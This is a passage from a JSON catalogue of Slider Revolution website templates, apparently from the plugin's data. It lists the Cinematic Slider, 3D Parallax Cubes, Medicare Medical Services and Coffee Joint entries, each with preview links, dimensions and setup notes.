for Your Foodie Website [Tutorial]\",\"guide_url\":\"https:\\/\\/www.sliderrevolution.com\\/tutorials\\/how-to-create-a-digital-menu-teaser-for-your-foodie-website\\/\",\"guide_img\":\"tutorial\\/restaurant-menu.png\",\"active\":\"1\",\"installed\":false},\"255\":{\"id\":\"273\",\"title\":\"Cinematic Slider\",\"alias\":\"cinematic-slider\",\"zip\":\"cinematic-slider.zip\",\"uid\":\"c53e7dcbb6b656ae7b4c91d333589838\",\"img\":\"cinematic-slider\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/cinematic-slider-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=cinematic-slider-template\",\"version\":\"1.0.0\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">Bold texts and a cinematic transition effect make this slider stand out!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"256\":{\"id\":\"274\",\"title\":\"3D Parallax Cubes\",\"alias\":\"3d-parallax-cubes\",\"zip\":\"3d-parallax-cubes.zip\",\"uid\":\"c5b809a1829f8f809c9a768cd3d6b3cb\",\"img\":\"3d-parallax-cubes\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/3d-parallax-cubes-slider-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=3d-parallax-cubes-slider-template\",\"version\":\"1.0.0\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">This amazing 3D cubes parallax effect can be an eye-opening intro for your website!<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package_order\":\"0\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"installed\":false},\"257\":{\"id\":\"275\",\"title\":\"Medicare Medical Services Website\",\"alias\":\"medicare-medical-services-website\",\"zip\":\"\",\"uid\":\"medicare-medical-services-website-package\",\"img\":\"packages\\/medicare_package.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/medicare-medical-services-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=medicare-medical-services-website\",\"version\":\"1.0.0\",\"required\":\"6.0.0\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">The Medicare Medical Services template is a great solution for your medical practice or hospital.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Medicare Medical Services\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"17\",\"installed\":false},\"258\":{\"id\":\"276\",\"title\":\"Medicare Menu\",\"alias\":\"medicare-menu\",\"zip\":\"packs\\/medicare-menu.zip\",\"uid\":\"0e4ca8fc281e20251b3fffa19d470fed\",\"img\":\"medicare-menu\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/medicare-medical-services-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=medicare-medical-services-website\",\"version\":\"1.0.0\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Medicare Medical Services template is a great solution for your medical practice or hospital.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Medicare Medical Services\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"17\",\"installed\":false},\"259\":{\"id\":\"277\",\"title\":\"Medicare Header\",\"alias\":\"medicare-header\",\"zip\":\"packs\\/medicare-header.zip\",\"uid\":\"03e8ade247d8c96f548bc0515f34043f\",\"img\":\"medicare-header\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/medicare-medical-services-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=medicare-medical-services-website\",\"version\":\"1.0.0\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Medicare Medical Services template is a great solution for your medical practice or hospital.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Medicare Medical Services\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"17\",\"installed\":false},\"260\":{\"id\":\"278\",\"title\":\"Medicare About\",\"alias\":\"medicare-about\",\"zip\":\"packs\\/medicare-about.zip\",\"uid\":\"a3ab9e89155ef2542820343f30b29f72\",\"img\":\"medicare-about\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/medicare-medical-services-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=medicare-medical-services-website\",\"version\":\"1.0.0\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Medicare Medical Services template is a great solution for your medical practice or hospital.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Medicare Medical Services\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"17\",\"installed\":false},\"261\":{\"id\":\"279\",\"title\":\"Medicare Highlight\",\"alias\":\"medicare-highlight\",\"zip\":\"packs\\/medicare-highlight.zip\",\"uid\":\"c3c8a74e5402489f1a85a0c83890ef1f\",\"img\":\"medicare-highlight\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/medicare-medical-services-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=medicare-medical-services-website\",\"version\":\"1.0.0\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Medicare Medical Services template is a great solution for your medical practice or hospital.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Medicare Medical Services\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"17\",\"installed\":false},\"262\":{\"id\":\"280\",\"title\":\"Medicare Services\",\"alias\":\"medicare-services\",\"zip\":\"packs\\/medicare-services.zip\",\"uid\":\"8869b0834d4649dcc3221bed65980806\",\"img\":\"medicare-services\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/medicare-medical-services-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=medicare-medical-services-website\",\"version\":\"1.0.0\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Medicare Medical Services template is a great solution for your medical practice or hospital.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Medicare Medical Services\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"17\",\"installed\":false},\"263\":{\"id\":\"281\",\"title\":\"Medicare Doctors\",\"alias\":\"medicare-doctors\",\"zip\":\"packs\\/medicare-doctors.zip\",\"uid\":\"2c9d57afd64244b5f7e30b0d87c842f9\",\"img\":\"medicare-doctors\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/medicare-medical-services-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=medicare-medical-services-website\",\"version\":\"1.0.0\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Medicare Medical Services template is a great solution for your medical practice or hospital.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Medicare Medical Services\",\"package_order\":\"6\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"17\",\"installed\":false},\"264\":{\"id\":\"282\",\"title\":\"Medicare Research\",\"alias\":\"medicare-research\",\"zip\":\"packs\\/medicare-research.zip\",\"uid\":\"31e84a91fc8b8d5296e715e539a076d0\",\"img\":\"medicare-research\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/medicare-medical-services-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=medicare-medical-services-website\",\"version\":\"1.0.0\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Medicare Medical Services template is a great solution for your medical practice or hospital.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"slider\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Medicare Medical Services\",\"package_order\":\"7\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"17\",\"installed\":false},\"265\":{\"id\":\"283\",\"title\":\"Medicare Why Choose\",\"alias\":\"medicare-whychoose\",\"zip\":\"packs\\/medicare-whychoose.zip\",\"uid\":\"6dad61c672127de9e35884caa45d49a0\",\"img\":\"medicare-whychoose\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/medicare-medical-services-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=medicare-medical-services-website\",\"version\":\"1.0.0\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Medicare Medical Services template is a great solution for your medical practice or hospital.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Medicare Medical Services\",\"package_order\":\"8\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"17\",\"installed\":false},\"266\":{\"id\":\"284\",\"title\":\"Medicare Contact\",\"alias\":\"medicare-contact\",\"zip\":\"packs\\/medicare-contact.zip\",\"uid\":\"89bc35ad8beb62a149c42262ae49a270\",\"img\":\"medicare-contact\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/medicare-medical-services-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=medicare-medical-services-website\",\"version\":\"1.0.0\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Medicare Medical Services template is a great solution for your medical practice or hospital.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Medicare Medical Services\",\"package_order\":\"9\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"17\",\"installed\":false},\"267\":{\"id\":\"285\",\"title\":\"Medicare Footer\",\"alias\":\"medicare-footer\",\"zip\":\"packs\\/medicare-footer.zip\",\"uid\":\"ccf63e5233b3d63009e5ee90db51b37b\",\"img\":\"medicare-footer\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/medicare-medical-services-website\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=medicare-medical-services-website\",\"version\":\"1.0.0\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Medicare Medical Services template is a great solution for your medical practice or hospital.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Medicare Medical Services\",\"package_order\":\"10\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"17\",\"installed\":false},\"268\":{\"id\":\"286\",\"title\":\"Coffee Joint Website\",\"alias\":\"coffee-joint-website\",\"zip\":\"\",\"uid\":\"coffee-joint-website-package\",\"img\":\"packages\\/coffee_package.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/coffee-joint-coffee-shop-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=coffee-joint-coffee-shop-website-template\",\"version\":\"1.0.0\",\"required\":\"6.0.0\",\"width\":\"1024\",\"height\":\"768\",\"description\":\"<span class=\\\"ttm_content\\\">The Coffee Joint website template is a great solution for your cafe or bistro.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Coffee Joint\",\"package_order\":\"0\",\"package_parent\":\"true\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"18\",\"installed\":false},\"269\":{\"id\":\"287\",\"title\":\"Coffee Menu\",\"alias\":\"coffee-menu\",\"zip\":\"packs\\/coffee-menu.zip\",\"uid\":\"81195cad7be3f5180a267b34ce8cf966\",\"img\":\"coffee-menu\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/coffee-joint-coffee-shop-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=coffee-joint-coffee-shop-website-template\",\"version\":\"1.0.0\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Coffee Joint website template is a great solution for your cafe or bistro.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Coffee Joint\",\"package_order\":\"1\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"18\",\"installed\":false},\"270\":{\"id\":\"288\",\"title\":\"Coffee Header\",\"alias\":\"coffee-header\",\"zip\":\"packs\\/coffee-header.zip\",\"uid\":\"5eed8adb9d3ae12168ad4735ac63eb20\",\"img\":\"coffee-header\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/coffee-joint-coffee-shop-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=coffee-joint-coffee-shop-website-template\",\"version\":\"1.0.0\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Coffee Joint website template is a great solution for your cafe or bistro.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Coffee Joint\",\"package_order\":\"2\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"18\",\"installed\":false},\"271\":{\"id\":\"289\",\"title\":\"Coffee Philosophy\",\"alias\":\"coffee-philosophy\",\"zip\":\"packs\\/coffee-philosophy.zip\",\"uid\":\"76b5ccae3fa87fd0f991b87e7ae71c27\",\"img\":\"coffee-philosophy\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/coffee-joint-coffee-shop-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=coffee-joint-coffee-shop-website-template\",\"version\":\"1.0.0\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Coffee Joint website template is a great solution for your cafe or bistro.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Coffee Joint\",\"package_order\":\"3\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"18\",\"installed\":false},\"272\":{\"id\":\"290\",\"title\":\"Coffee Carte\",\"alias\":\"coffee-carte\",\"zip\":\"packs\\/coffee-carte.zip\",\"uid\":\"470214ddd2cec585629fb79a0fd908d6\",\"img\":\"coffee-carte\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/coffee-joint-coffee-shop-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=coffee-joint-coffee-shop-website-template\",\"version\":\"1.0.0\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Coffee Joint website template is a great solution for your cafe or bistro.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Coffee Joint\",\"package_order\":\"4\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"18\",\"installed\":false},\"273\":{\"id\":\"291\",\"title\":\"Coffee Teaser\",\"alias\":\"coffee-teaser\",\"zip\":\"packs\\/coffee-teaser.zip\",\"uid\":\"2ed868896c92a7bfb6431803c79e8486\",\"img\":\"coffee-teaser\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/coffee-joint-coffee-shop-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=coffee-joint-coffee-shop-website-template\",\"version\":\"1.0.0\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Coffee Joint website template is a great solution for your cafe or bistro.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" target=\\\"_blank\\\">Content Blocks instructions here<\\/a>.<br><br>\\r\\n<span class=\\\"ttm_content\\\">Checkout our <a href=\\\"https:\\/\\/revolution.themepunch.com\\/documentation\\\" target=\\\"_blank\\\">Documentation<\\/a> for basic Slider Revolution help.<\\/span>\",\"cat\":\"Premium\",\"filter\":[\"hero\",\"website\"],\"plugin_require\":null,\"date\":\"0000-00-00 00:00:00\",\"package\":\"Coffee Joint\",\"package_order\":\"5\",\"package_parent\":\"\",\"modal\":\"0\",\"additions\":\"\",\"guide_title\":\"\",\"guide_url\":\"\",\"guide_img\":\"\",\"active\":\"1\",\"package_id\":\"18\",\"installed\":false},\"274\":{\"id\":\"292\",\"title\":\"Coffee Find Us\",\"alias\":\"coffee-findus\",\"zip\":\"packs\\/coffee-findus.zip\",\"uid\":\"96d3784473dfa64bce9e1e4101919927\",\"img\":\"coffee-findus\\/slide1.jpg\",\"preview\":\"https:\\/\\/revolution.themepunch.com\\/coffee-joint-coffee-shop-website-template\\/?utm_source=admin&utm_medium=button&utm_campaign=srusers&utm_content=coffee-joint-coffee-shop-website-template\",\"version\":\"1.0.0\",\"required\":\"6.0.0\",\"width\":\"1240\",\"height\":\"868\",\"description\":\"<span class=\\\"ttm_content\\\">The Coffee Joint website template is a great solution for your cafe or bistro.<\\/span>\\r\\n<span class=\\\"ttm_space\\\"><\\/span>\",\"setup_notes\":\"<span class=\\\"ttm_content\\\">If you want to setup the full website example as seen in the preview, please follow the <a href=\\\"https:\\/\\/www.themepunch.com\\/faq\\/setup-content-blocks-template\\/\\\" 